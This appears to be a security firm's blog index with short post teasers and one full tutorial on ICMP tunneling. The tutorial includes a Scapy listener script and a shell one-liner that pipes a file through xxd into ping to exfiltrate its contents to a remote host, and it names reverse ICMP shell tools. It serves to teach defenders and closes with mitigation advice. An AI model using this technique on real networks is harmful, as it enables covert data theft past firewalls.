General

by mrahier96 mrahier96 No Comments

Traffic Light Protocol (TLP) had a change of colours

A word on FIRST

FIRST is the Forum of Incident Response and Security Teams. Since 1990, when FIRST was founded, its members have resolved an almost continuous stream of security-related attacks and incidents including handling thousands of security vulnerabilities affecting nearly all of the millions of computer systems and networks throughout the world connected by the ever growing Internet.

FIRST brings together a wide variety of security and incident response teams including especially product security teams from the government, commercial, and academic sectors.

TLP means Traffic Light Protocol, it is a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).

TLP means Traffic Light Protocol, it is a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).

Read more

by mrahier96 mrahier96 No Comments

Agile threat modeling and the “the devil is in the details” idiom

Disclaimer

This post is based on the following elements:

    1. My experience working as a developer (2003-2015) and then as a full-time Application Security Consultant (2015-present).
    2. The collection of trainings I have recently followed about Threat Modeling activity.
    3. My regular technical survey on the Application Security field.

📢 Therefore, it is quite possible that my point of view is wrong in some aspect or biased. In this case, I will be more than happy to get feedback to make my point of view evolve.

Read more

by mrahier96 mrahier96 No Comments

The Principle of Least Privilege | What & How to manage, control and monitor it ?

Today’s Context about Covid and Teleworking. How is it going ?

Remote working is here to stay, requiring companies to maintain their efforts to combat cyber-attacks. Companies are now requesting security solutions to accommodate this new level of flexibility. To adapt to a changing world, some are embracing to hybrid work, while others are opting for full-time telecommuting. The goal is the same: to transparently improve workers’ working conditions regardless of their location.

If having unrestricted access to a customer’s IT assets is an integral part of a service provider’s business, it leaves them vulnerable. By offering comprehensive PAM solutions, distributors will be able to secure, manage and monitor access to their own and their customers’ privileged accounts, keeping their network’s most valuable keys safe.

Read more

by mrahier96 mrahier96 No Comments

Web ASseMbly : how to understand, debug and mess with it

Introduction

The goal of this post is to provide basics of Web Assessmbly (abbreviated “Wasm”), so the next time you encounter it, you will be able to understand it and test it.

I will not cover all the available instructions as documentation exists for that (see a bit below), but I will try to give you the keys to understand any Wasm code.

Documentation

The documentation for all the instructions in Wasm is available here: https://github.com/sunfishcode/wasm-reference-manual/blob/master/WebAssembly.md

Moreover, a good picture of how to write Wasm code can be found here:
https://learnxinyminutes.com/docs/wasm/

If there is documentation, why this post?

It’s simple:

  • Not everybody has basics on how to read assembly code and the tools to handle Wasm are not numerous
  • The mentioned documentation (which is the official one) is, in my opinion, not the most comprehensive one.

So the goal is to address these two points.
Read more

by mrahier96 mrahier96 No Comments

How does ICMP tunneling work and how can it be used for malicious purposes ?

The ping command is one of the first commands you learned when coming to the IT world. And yet, it is possible that it is still hiding secrets from you.

Through this blog post, I will demonstrate how attackers could use the protocol behind this command to bypass firewall rules leading to data exfiltration or communication with a command and control.

How does the Internet Control Message Protocol (ICMP) work ?

The ping command use the Internet Control Message Protocol (ICMP) which is a supporting protocol in the Internet protocol suite.

It is used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address for example. An error is indicated when a requested service is not available or if that a host could not be reached.

In fact, when you use the ping command, two types of control messages are used:

  • The type 0 which is an Echo Reply.
  • The type 8 which is an Echo Request

From the RFC792 which defines ICMP for IPv4, the fields for an echo or reply message are the following :

0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data …
+-+-+-+-+-

As an attacker, the data field is the one useful to communicate. In a usual case of pinging, the data received in the echo request message must be returned in the echo reply message. That’s how we know that a remote host is reachable.

An In-depth examination of the topic

Let’s see an example, below is a ping initiated from a Windows machine.

Example of a Ping initiated from a Windows machine.

Figure 1 – Ping initiated from Windows machine

The ping is successful and from the output, two values should be noticed :

  • The TTL (Time To Live) value which could be used to help you identify the kind of OS of the remote machine. For a TTL value <= 64, it’s usually a Unix based OS.
  • The bytes value which is the length of the data, in this case the data is 32 bytes long.

Analysing the same ping using Wireshark showed that each echo request from my Windows machine sends the alphabet by default. As expected, the same data is returned by the remote Linux machine.

Windows ping analysis

Figure 2 – Windows ping analysis

However sending the alphabet is not mandatory. In fact, the ICMP protocol allows sending any data as we want.

To prove it, let’s initiate a ping from the Linux machine this time. By default the Windows host firewall deny the ICMP Echo Request IN so the according rule should be open.

Ping initiated from Linux machine

Figure 3 – Ping initiated from Linux machine

This time we can notice that the TTL value is <= 128. This indicates a reply from a Windows machine.

Analysing the ping showed the alphabet is not sent anymore and the data is longer than 32 bytes.

Linux ping analysis

Figure 4 – Linux ping analysis

However, 48 bytes are still far from the maximum allowed. Indeed, because ICMP is built on top of the IP layer, in its version 4, the maximum size allowed by these packets is 65535 bytes. Removing the headers of IP (20 bytes at least) and ICMP (8 bytes), it is possible to have 65507 bytes of ICMP data.

But if we assume the maximum transmission unit is set to 1500 (which is the default for ethernet), the maximum payload without fragmentation is limited to 1472 bytes (1500 – 20 -8). In case of fragmentation, the server should be able to handle multiple icmp requests and add their data together.

A Simple Proof of Concept (PoC)

As shown in the previous experience, we can communicate different data with different lengths through ICMP request and reply. Knowing that, we could exfiltrate the content of a file or performed commands send by a command and control server using ICMP.

However, to do this, we first need to disable ICMP replies from our attacker server by running the following command as root :

sysctl -w net.ipv4.icmp_echo_ignore_all=1

Otherwise, the client is unlikely to receive commands send from the server because automatic replies will send back the same data.

Once the command done, pinging from our Windows machine now print a request timed out because no data is returned.

Request timed out because no reply received

Figure 5 – Request timed out because no reply received

Analysing from the Linux machine showed the communication is one-way.

Analysing the one-way communication from Linux machine.

Figure 6 – ICMP automatic replies disabled

Let’s craft a simple Proof of Concept to exfiltrate a file content based on ICMP request. To do this, a very useful python library named Scapy was used.

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.

On the server side, this simple script which should be run as root will just listen for ICMP on the wire. For each packet received, it will run the exfiltration function which parse and collect the last 4 bytes of the ICMP data using the load method.

#!/usr/bin/python3
from scapy.all import ICMP,sniffinterface = “eth0”
remote_host = “192.168.23.138”def exfiltration(packet):
if packet.haslayer(ICMP):
if packet[ICMP].type == 8:
data = packet[ICMP].load[-4:]
print(data. Decode(‘utf-8’), flush=True, end=””)sniff(iface=interface, filter=”icmp and host “+remote_host, store=True, prn=exfiltration)

Client side, on a Linux machine, we could exfiltrate a file using this simple command :

xxd -p -c 4 test.txt | while read line; do ping -c 1 -p $line 192.168.23.139; done

Where test.txt is the file we want to exfiltrate. Notice this is very long because the data is sent 4 bytes by 4 bytes, the -p option of the default ping binary allow up to 16 bytes.

Otherwise we could also use Python and Scapy to send data more rapidly by crafting our ICMP packets.

Finally, if we were on a Windows machine, the native ping binary has no options to custom the icmp data. We could run a crafted exe but there is usually fewer restrictions regarding companies policies on PowerShell which allows to perform this customisation like in the tool Invoke-PowerShellIcmp.ps1.

Discover a Suite of Complete Tools to get an ICMP shell

The previous PoC is not optimised because it is a one-way communication and all the data bytes available for the protocol were not used. This leads me to introduce a suite of complete tools which exploit fully the ICMP protocol in a form of a shell.

First, Icmpsh which is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python2. It does not require administrative privileges to run onto the target machine but an executable should be dropped on the machine, which can be hard to do in case of endpoint hardening for example. Furthermore, Invoke-PowerShellIcmp.ps1 is a client compatible with icmpsh and could be more easily dropped on the client machine.

Next, icmpdoor is a shell written with Python3 and Scapy, it comes with an executable to run it directly on Windows.

Below is an example of the above tool running. From the Linux C2 machine, I’m able to run command on the Windows target machine, through ICMP.

Connection to the C2 from the victim machine.

Figure 7 – Connect to the C2 from the victim machine

 

Example of ICMP tunnelling from the C2.

Figure 8 – Running commands through ICMP tunnelling from the C2

How to mitigate ?

You should now ask yourself how mitigate this. Well, there is a radical option which consists to block ICMP traffic and so ICMP tunnelling. But in practice, many companies don’t want to lose the ping functionality that is very useful in many situations for debugging purposes.

Another way to mitigate this type of attack is to only allow fixed sized ICMP packets through firewalls, which can impede this kind of behavior. But again, an attacker could craft ICMP packets with a length which look like legitimate (e.g 32 bytes of data).

The best answer, in my opinion, is to disable ICMP outgoing traffic and enable ICMP traffic inside only where it is necessary. Furthermore, defenders should monitor carefully on the wire for suspect behaviors such as ICMP request without default value as data.

References

If you like this article, discover other related articles addressing privileged access management or cybersecurity articles on Excellium Services blog.

Author : Alexandre Guldner

by Excellium SA Excellium SA No Comments

SIEM vs SOC vs CFC: What is the difference?

In today’s article, we discuss SIEM, SOC and CFC.

Cyber threats have grown significantly over the last decade. From simple malware to complex advanced persistent threat groups. Threat actors have progressed significantly, they are constantly improving their methods and techniques to breach security controls causing massive damage and disruptions.

Read more

by Excellium SA Excellium SA No Comments

Armacell: Speeding Up Incident Response and Recovery with Azure Sentinel

Armacell: Speeding Up Incident Response and Recovery with Azure Sentinel

Armacell is a global manufacturing company, providing flexible insulation foams for the equipment insulation market. As a growing company relying increasingly on the cloud, they need fortifying their defence against security threats. As part of that initiative, they needed a partner that could manage threat identification and incident response with them — and that’s where Excellium came in. Building their solution on Azure Sentinel, Excellium will help Armacell with a cost-effective approach to event collection and collation, threat detection, incident investigation, and rapid response. Read on for the details. Read more

by Excellium SA Excellium SA No Comments

The art of hiding secrets in plain sight with base64 padding steganography

The technique of hiding information in public data is called steganography. The Base64 encoding uses 0-padding when encoding data. It is possible to hide information in this padding, as it is disregarded upon decoding. For efficiently hiding larger amounts multiple strings need to be encoded as one Base64-encoded string can contain 4, 2 or 0 bits of secret text. This article explains the technique, provides a python code for hiding and retrieving the information and shows performance information about the method.

Read more

Top